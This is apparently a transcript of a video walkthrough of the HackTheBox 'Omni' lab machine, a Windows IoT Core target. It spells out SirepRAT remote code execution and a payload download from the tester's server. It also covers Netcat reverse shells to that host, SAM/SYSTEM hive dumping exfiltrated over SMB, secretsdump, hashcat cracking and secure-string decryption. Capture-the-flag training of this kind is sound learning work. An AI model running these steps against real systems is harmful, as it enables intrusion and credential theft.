Hey guys, I'm Ryan. Today I'm going to be showing you how to do Omni from HackTheBox. This is a pretty cool box. I learned a few things that I didn't know before, saw a few things that I hadn't seen before, so that's always cool. We're just going to dive right into it. First thing I'm going to do is make a new tab. I'm going to rename that tab to be the IP address of the box. I always do that so that way, in the event that I forget what the IP address is, it's just right there. I don't have to go hunting for it. Then I'm going to cd into a folder that I made earlier called Omni, and we're going to run nmap sudo nmap, and I have it already written out, sudo nmap minus sc for scripts, minus sv for versions, minus v for verbose, minus on for output normal format. I'm going to call it nmap scan, and then we got the IP address of the box. Put the password in there so we can run as sudo, and it goes off to the races. Right away, we can see that we have port 135 open and port 8080 open. Port 135 is going to be Windows RPC, Windows Remote Procedural Call. That is used for a lot of things. It's used to make a remote call to a procedure, but it's used by DCOM components, firewall, the registry, Active Directory. So this is a pretty common thing to see on a Windows box. And because of that, I usually leave it alone and use it as sort of a last resort. If I can't find any other attack vector into the box, then I might start looking at RPC. But RPC, oftentimes I find, tends to be a bit of a rabbit hole. So if I can't find anything else, then I might look at RPC. But for now, let's go ahead and look at port 8080, which is running a Microsoft IIS web server, which is Internet Information Services. That's just Microsoft's web server. And we can see that the server header is Microsoft HTTP API 2.0, and that we have a 401 unauthorized with a basic realm of Windows Device Portal. So this probably means we're going to get some sort of HTTP authentication, basic auth. But let's just go ahead and look at it just to be sure about what we see there. And indeed, we get this HTTP authentication, and it says Windows Device Portal. So we can go ahead and copy that. And is there anything else here? No, it doesn't look like there's much of anything else at all. If there was a bit more, or there was basically anything other than just RPC and a single web server that required HTTP authentication, I would probably run Nmap Automator. If you don't know what Nmap Automator is, it's a script that automates Nmap, and it can test for vulnerabilities and things like that to see if something is vulnerable. It's pretty cool. I usually would run that scan, but in this event, I'm just not going to do it. For now, we can go ahead and Google Windows Device Portal, and right away we see this come up, which is Windows IoT documentation. And then up here we see IoT Core. So this box is probably running Windows IoT Core. And if you don't know what Windows IoT Core is, I don't blame you, but you might know what Windows Embedded is. Windows Embedded was the version of Windows meant for embedded devices, like small devices, like point of sale things. You might see it on like an ATM or like a cash register. Yes, cash registers do run Windows, amazingly. But you might see it on something like that. And in Windows 7 and Windows 8, it was called Windows Embedded. Linus Tech Tips famously made a video about it, calling it Windows 9. But when they moved over to Windows 10, they rebranded Windows Embedded as Windows IoT. So Windows IoT is a stripped down version of Windows. It's meant for, of course, embedded devices, small devices, things like Raspberry Pis. It can run on ARM chips or x86 64, and it does not have access to a lot of the regular Windows APIs. So it doesn't have anything that uses the create window method, for example, cannot run on Windows IoT. And anything that uses APIs like the Windows Form API or the Windows Presentation Foundation, the WPF API, cannot run on Windows IoT. It can run Universal Windows Platform apps. Universal Windows Platform apps are universal. They will run on any Windows device. If it's called Windows, it can probably run a UWP device, a UWP program. But Win32 apps can still run on Windows IoT, so that's good to know. Like Win32 console apps and C++ applications that don't use any of the APIs that have been stripped out should still work on Windows IoT. And I believe only C++ applications are at least officially supported. If they aren't UWP. You can do a lot of languages if it's UWP, but if it's not UWP, I believe it's only C++ applications that are supported. So with that knowledge, we can go ahead and try to see if there's any exploits for Windows IoT Core. Just Google for an exploit here. and right away we get something, first results on Google, this thing called SirepRAT. I hope I'm pronouncing that right, SirepRAT, and that allows for remote code execution as system, which is basically equivalent to like roots on Linux, on Windows IoT Core. So we can get RCE as system on Windows IoT. This seems pretty promising. So let's just open up the terminal again, and oops, I'm just going to copy that, and then I'm going to open up the terminal again, and I'm just going to do a git clone of that, and let's just see, cd SirepRAT. Okay, so cool, we have it now, and we can do a pip3 install -r requirements.txt just to make sure we have all the requirements, everything that we need to run this. Okay, and I already have it satisfied, and then we can do SirepRAT python3 SirepRAT.py. So let's see, SirepRAT, the following arguments are required. So let me do sh. Okay, here we go. So now we can see all of the commands that we can do, and we have launch command with output, put file on device, get file from device, and get file information from device, get system information from device. We have a fair amount of things that we can do. So if we go back to the GitHub, we can see that to run an arbitrary program, this is the command. We're going to do SirepRAT, the IP address, launch command with outputs, return outputs, and then whatever command or I guess executable that we want to run. And we can also do a few other things like get system information from device. So let's just go ahead and try something just as like sort of a sanity check to make sure that it's working. Python3 SirepRAT.py 10.129.80.21, and let's try a get system information from device. And is that going to give me anything? Oh, it does. Okay, so that worked. So we did get some information here. We got the build number, service pack, major and minor, and just some other stuff. It's a bit of a weird format. I don't really like this format that SirepRAT outputs in, but at least we know now that, hey, we're getting a response from the server, so our program, at least at some level, is working. So that is pretty cool. The next thing we can do is we can try running an actual command, SirepRAT.py. Let's see, 10.129.80.21. Let's do launch command with output return. It's an underscore, yes, return output, and then let's see, what was it? CMD. And then let's do c/windows/system32/cmd.exe, and then -args we'll do /c, which in Windows is /command, so run a command. And let's just check what the architecture is. Let's see if it's 32-bit or 64-bit. So we can do wmic os gets OS architecture, and we can just run that and see if that works. And I got an error. Oh, I got a syntax error because I put 2 T's in outputs. Those are no fun, so let's get rid of that. Okay, and we did get a response. We got 64-bit. The OS architecture is 64-bit, so we know that it's running a 64-bit version of Windows IoT. I actually don't know if there's a 32-bit version, but at the very least now we know that it's running 64-bit, so that's good. The next thing we could do is we could try to use this to get ourselves a shell on the system. So we're going to download Netcat onto the system, and if you don't know where Netcat is, if you have Kali, Netcat is in user/share/Windows binaries. Yes, Netcat. nc.exe. However, the problem with this is that nc.exe is 64-bit. I mean, it's 32-bit in that Windows binary, and we need 64-bit. So we're going to have to go ahead and grab a 64-bit version of Netcat. So nc64exe, and it's right here, and you can download that. I already have it downloaded, and that exists in my toolbox slash pervesc slash Windows, I believe, ls. Oh, no, it doesn't. No, it does not. So I will have to download that. Save file. Okay. So I'm going to go and cd my dub folder that I use for when I start up a Python HTTP server, and I'm just going to copy that from my downloads to here. Double check that's there. Okay. So I'm going to start up a Python 3 HTTP server. So Python 3 -m HTTP server, and we can start that. And that's good. So now we're going to try and download Netcat from my Kali VM onto this box. So we're going to do Python 3 SirepRAT.py 10.129.80.21 launch command with outputs return outputs UMD. And how do I want to do this? So I should probably try, I'm just going to try to see if it'll let me just do PowerShell without actually specifying the location of the executable. I'm just going to see if it's just going to let me just specify PowerShell. And I will do, as my args, I will do invoke request http //10.10. I don't even need that. 10.10.14.90 and then port 8000 /nc64.exe, and let's just see if that works. Okay, I thought my previous command wasn't working, but I realized that I made a very obvious mistake. I didn't do web request. I did invoke request. It's not invoke request. It's invoke web request. So we're just going to do that again and request nc64.exe out file nc64.exe, and this will work. So I will do that, and you can see I tested a couple times. Now we have a third one here, so that did work. And now we can open up a Netcat listener, port 9999, as I always do, and we can run that. So we will run nc64.exe 10.10.14.90 -e PowerShell, and we are connected. So I will just go ahead and kill that, and now we have a shell on the box. Congratulations, we've done it. We have done it. That's it. You can go home now. No, of course not. We still have quite a fair bit to go. So if we can just, yep, so we can run commands. Everything's working fine. So let's just go ahead and take a look around the box. Let's just cd our way back to the, cd our way back to the root directory. Dir, okay, let's do dir -a. Oh, apparently it doesn't like that. Dir -a. Apparently it doesn't like that. I'm just gonna run cmd.exe, and we're gonna drop into a command prompt because sometimes PowerShell acts a bit weird. Dir -a. Okay, that works. So dir -a is the equivalent of like ls -a in Linux. A means all attributes, so we can see files of any attribute, including hidden files. So let's just compare what's hidden, what's not hidden. So we have reconfig. Let's see, program data showed up. That wasn't there before. System volume information. Not a lot that's like particularly interesting. This is interesting, this junction. That's like certainly not normal, and it's a junction, so it's linking to some other location. So this is just a link. I think a junction's a soft link, I want to say. I want to say a junction's a soft link in Windows. It's linking to some other place, so that's interesting. But for now, let's go ahead into the users folder, dir /a. There's a default. Let's cd default dir /a, and there is some ntuser.dats, which are basically settings that will follow around a user, like that who's part of a domain. So if you log in to a computer, like it's just basically your user settings. They'll follow you around. Those aren't particularly interesting. Let's cd into public and see if there's anything there. Dir -a, there's nothing. So nothing particularly interesting there. Let's cd into this data and see what we get here. And we get another Windows installation, it looks like. So this junction is pointing to another Windows installation. So that's fun. That's a bit unexpected, and it's cool. So we have a test directory. Let's just cd into test and see what that is. Because, if you ever see something like test, that's obviously, something that you want to take a look at first. dir/a. We have a bin folder, dir/a, wdtf, dir/a. And it doesn't really look like there's a whole lot there that's particularly interesting. Let's cd. Did I do a dir/a here? There's some log files, crash dump, some various stuff, but let's check the users folder. And we have a few users here. We have an administrator, app, a default account, a DevTools, user, public, and system. So let's just go through these in alphabetical order. Let's cd into the administrator and dir/a. And let's see, we have an into user dats. There's the root.txt. Is there anything else in here that's particularly interesting? Let's get rid of all the hidden stuff. There's root.txt. Let's just see if we can see that. So in Windows, it's type instead of cat, so type root.txt. And this is not a hash. This is not a hash at all. This is a PSCredential XML file. So that's interesting. And we can see here that we have the username is flag, and then the password is this. So this is probably our flag. But this is definitely not our flag in its native format. This is encrypted. Here we have an S. That S denotes a string. But this SS denotes what's called a secure string. And that is a bit different from a regular string. It's something specific to Windows, and it's their way of solving the problem of having passwords existing in plain text in files. So a secure string uses the data protection API to encrypt the password in plain text and then store it in a protected memory module, and I believe it uses like the RTL encrypt memory function, maybe, possibly, to do that. But it basically moves it out of the application scope into a protected memory module to keep it secure, so that way you don't have to have your password be as vulnerable. And this is encrypted using a person's network credential. And the only way to decrypt it, there is a function convert from secure string, but the only way we can do that is if we are doing it as the user whose secure string this is, whose credential this is. So we can go ahead and we can back out of here, and we'll just take a bit more of a look around. Oh, don't want to do that. cd users, dir. Let's cd app, see what's in here. Okay, so we have hardening.txt. That sounds fun. Let's just go ahead and see if we can see that hardening.txt, and we can. Okay, so I believe we're system. I believe that's what SirepRAT told us we are. We are system. So we could probably do something to force permissions on here. I tried to do that honestly earlier when I was messing around preparing, and I was having trouble doing it, and I didn't particularly look in how to do it correct. But I don't think that that's the intended method anyway. But yeah, we don't have access to view hardening.txt, but we do see a user.txt, so we can take a look at that. And it's another PSCredential file. What else do we have in here? Oh, what else do we have in here? We have an IOT admin. So type IOT admin.xml. And yeah, so this is the same thing as before. It's just another PSCredential file for the user administrator. Okay, so now from here, we actually have a few things that we can do. There are two methods to move forward. One is intended and one is not, I believe, but I actually don't know which one is which. So I'm going to show you what I did, the easy method first. I'm going to show you the very easy method first. This method is what I did, and it got me basically what I needed to get really, really fast. So I'm just going to show you guys this one first. We're going to do a dir /a/s, so a dir all attributes /s. We're doing a search, and then I believe what we're going to do, this. So what that's going to do is it's going to search for all the batch files on the system, and this is roughly your equivalent of like searching for all the all the scripts, like a shell script if you're looking for a .sh file on Linux. This is basically the same logic. You're just looking for like any scripts that someone might have left around. And we see a few, we have two build.bats from Pester, and Pester is it's a testing module for PowerShell. And these are in like the actual folder, so I don't think these are relevant at all. But we have this r.bat. So we can go ahead and take a look at r.bat. So we can type c/program file /windows PowerShell /module /package packagement. Yes, package managements /r.bats. Oh, I'm bad. I thought I didn't need to type in the capitals, but we'll just do it the proper way. Windows PowerShell /modules cd package management dir /a. Yes, type r.bat. Okay, so it looks like we have a script here, and it just went ahead and, well, from right here, it just basically set the passwords of the users: netuser app and mesh 5143 and netuser administrator. So it set the passwords of these two local accounts. And this net local group administrators do local group administrators delete. Okay, cool. Ping, and then yeah. So this is, I don't know if this is what was intended or if this was left over from the creation of the box, or if it's just meant to be, a multiple pathways to the flag. But right now we have this, which is super nice because now we have the passwords of both. So from here, what we could try to do is a run as, but run as does not exist on the system. So the other thing we could do is we could go ahead and log into that that portal that we saw earlier on port 8080, and we could see what's on there. But before we do that, I'm going to show you the other way, which is harder. So if you don't want to see the other way, which I actually believe is probably the intended way, or maybe it wasn't the unintended way, actually, I really don't know. But if you don't want to see the harder way, go ahead and skip ahead in the video. But I'm going to go ahead and show you guys that right now. So the other way that we can do this is that we can grab the security account manager database, which is where like all of the hashes are stored for the users, and we can run that against Hashcat, and we can basically come up with the passwords that way. So we're gonna go ahead and do that. So we're just gonna go ahead and cd c/windows /system32/config, and this is where those two things are stored. And what we're looking for is SAM, security account manager, and system. That's what we want. We want those two things. So we can try to copy these, and we cannot copy them because they're being used by another process, which means they are write locked. So, and I guess read locked too. So we are going to have to save them from the registry instead. So we can do a reg save hkey local machine /sam, and then save that to C. Oh, that's not what I wanted to do. Reg save hklm /sam C/sam, and then reg save regsave hklm /system c/system. Okay, cool. So now we have those. We have to get them onto my local box so we can crack them. So there's a few ways we could do this. We could try using Netcat. However, I tried to do this with Netcat, and the hash, the checksum, kept on changing every time I would send it. Even though the file would go through and I could see the data inside the file, the checksum would change, so things were getting messed up. So Netcat wasn't very reliable. And I tried to do a nope, that's not what I want. I tried to do a Impackets SMB server, but this ran into a lot of problems where I believe it wasn't properly supporting SMB2, and it was not working. But you could try doing a SMB server with Impacket, and that might work for you. For now, I'm going to say that the best way for me to do it is to go ahead and just use a regular SMB share, like a regular Samba share. So we're going to go ahead and set one up. So I'm going to sudo nano /etc /samba /smb.conf. And we're going to scroll down, and we're just going to add an entry at the bottom of this. And no, I don't use Vim. No, I don't use Vi. I know I am dirty scum. I use Nano. Feel free to make fun of me for it in the comments. So now I'm going to do let's see, what do I want to name this? Somb. And then path equals /home /Kali /SMB. And I've already made this folder, by the way, so you would want to, of course, make this folder before you do this. Read only equals no. Browsable equals yes. And I believe that is all I need to do. And at this point, I go ahead and I can restart Samba, SMBD restarts. And then configure the firewall to allow Samba. Do I have that? Do I have UFW? No, I do not have UFW, so I don't even need to do that. Cool. All right, so that should be working now. So we can go ahead and try to copy that. So let's just cd. Okay, and copy. Let's make sure they're here. They are. Copy SAM to send.14.90/somb. And I get access is denied. Great, thanks, very cool. So let's just figure out why that is being denied real quick. Okay, after a little bit of looking around, I think I figured out why it's not working. I forgot to add the guest OK flag, I guess, guest OK line at the bottom of this file. So let's just go ahead and add that. Guest OK equals yes. You might also need to do chmod 777 on the folder. And we can try this again. One file is copied, okay, so let's just make sure. So cd smb ls, and SAM is there. Okay, so now we can copy system 10.14.90/samb, and one file copied, ls, and now we have both. Very nice, very nice. So now we can do Impackets, and then I believe it is secrets dump. Yeah, Impacket secrets dump. So we can just go ahead and look at that to get the information from it. And I'm just gonna go ahead and kill this. And kill this too. And we're gonna open up a new one that's vertical. and then I'm going to cd smb, and we're going to do unpacket secret stump. Okay, so let's go ahead and look at this and see what we get. And we're going to need to specify a few things. So we need to specify unpacket secret stump, system. Is it 2? No, it's just 1. We need to specify system. That's system, and then Sam, and that's Sam, and then the computer is local, I think. Yes. And okay, cool. So we get some hashes here. We can copy those, and I'm just gonna pop them in a text file. And yes, I'm doing this with the GUI. I know I'm terrible. Boxes, Omni. We're just gonna save this as hashes. Okay, so then we're going to just clear this, and let's cd back into boxes slash Omni, and now we're going to need to run hashcat, and we can go ahead and try to crack those hashes. 1000, I believe, for NTLM hashes, and we'll do user, and then hashes, and then /user /share, word lists, and then is rocku in there? Yes, rocku is in there, so we'll go ahead and rock that. And I'll do status and status timer equals 1. Actually, I'm going to add a -o because it's yelling at me for using unoptimized kernels, so we'll optimize the kernels, and now we'll go ahead and let this run. And it looks like we did recover 2 out of the 6, so we can just run that command, but with show, and it shows us the ones that were cracked. So we cracked the default and the guest, which had no password, and app, and we got mesh 5143. So this is the same password that we got earlier for app mesh 5143 from the r.bat file. But now that we have this, you could have done this either way. And in the event that you ended up with a similar box and you couldn't find, say, any batch file that had passwords written in plain text, you could try this method and try to crack the hashes from the secure account manager. So now that we have this, we can go ahead and we can go back to the box and try to log in. And I forgot what the IP of the box was, and it's 129.80.21. So 10.129.80.21, port 8080, and mesh 5143. So we'll log in with app mesh 5143. And we get to this wonderful little Windows device portal. So let's take a look around this device portal, and we have a file explorer, which is great. So we could snip around the files. We have an apps manager. We can install certificates, run things from the network, install packages, apparently, upload things. That's cool. Monitor performance. So we have a whole bunch of stuff we could do here. And we can even enable the remote server. But this is where we want to be, the run command option, because this gives us RCE as the app user, because we are logged into the app user. So let's just go back to our terminal, and I forget where I put that NC64. So is it in System 32? I forget where I put it. We're just gonna download that again. So I'm just gonna clear this, and we're gonna see into www ls python 3 sm http server, and I'm just gonna re-download it. Okay, so I'm just re-downloading that NC64, that Netcat exe into the C directory, so I know where it is, because I lost track of it before. And now we can go back over here, and let's just see what type of commands this is. So I believe this is just going to be, I can just run anything like it's command prompt. So let's just try c/nc64.exe 10.10.14.90 Let's do 8888, and then minus E, CMD, and let's just make sure we have a Netcat listener open, and C minus LP minus 8888, and we can go ahead and run that. And we have another shell. So if I echo the username, I believe is how I do this, app. So I am app, which is great because now we should be able to decrypt that secure string for app and get the user flag. So in order to decrypt that string, we're going to need to go into PowerShell. And the command for this is, well, first of all, let's just cd into c/data/users dir cd app dir and user.txt. Okay, so I believe the command for this is imports CLI XML path user.txt .get network credential dot password, and okay, there we go. We have the flag for the user. And by the way, the reason it's .password because if I type user.txt, what I'm doing is I can get these ends. So .password gets me what's inside of this, which is this thing, and then it's decrypting it from being a secure string into being a regular string, which is nice. And then we can do the same thing for this guy here, I believe. First of all, let's just see what's in that hardening. Change the default administrator password of password, added firewall rules to restrict unnecessary services, removed administrator accounts from message page users. So this is not particularly helpful. So even if we had done some privilege stuff or some permission stuff to change the permissions of that, it wouldn't have particularly helped us. But we can try it with that IoT admin. Import CLI XML minus path IoT admin.xml get network credential dot password, and we get the password, which we already knew from earlier, Internet of Things. So then we can go ahead and do the same thing as we did before. So I'm just going to exits C minus LVP 8888, and we'll go back here. And how do I log out of here? I actually don't know how to log out. How do I get out? Oh no. Help. Help. Help, I'm logged in and I can't get out. We'll just open up a new private window, I guess. 10.129.80.21.8080, and that was administrator. Paste that password in, and we're back here. So where was it? Processes, bug, activity. Where was the thing? Run command. I'm blind. Apparently, I'm just blind. Okay, so we're gonna do C/NC 64.exe 10.10.14.90 minus E, and because we're just gonna drop into PowerShell anyway, I'll just do PowerShell, and we'll run that. And we're back into a PowerShell shell. So then we'll just go ahead and we'll do the same thing we did before. We'll cd c/data/users/administrator, and we'll do the same thing, but this time for that root.txt. So we will import CLI XML minus path root.txt.get network credential dot password, and there we go. We have the administrator hash, the administrator password, and those are our two flags for Omni. So overall, I think this box is really cool. If you don't know what Windows IoT is, this is like a really great box because it just demonstrates, such a cool exploit, and the fact that it's just, what a crazy exploit. RCE that gets you system privileges, so you don't even have to really do any privilege escalation. And then if you weren't familiar with how secure strings work, now you've been sort of introduced to secure strings. We searched for a bat file, and we also dumped the security account manager and the NTLM hashes, and we cracked those with Hashcat. So I hope you enjoyed the video. This was my first video, so it was a bit rough. But if you liked it, go ahead and give me a like or hit subscribe, or head over to my HackTheBox account and give me some respect. In the description will be articles linking to all the things that we covered today so you can learn more about them, as well as once the written version of this write-up is on my blog, I will be linking that in the description as well. So you can go ahead and check that out if you want. But I hope you guys had a good time, and remember, try harder or try smarter.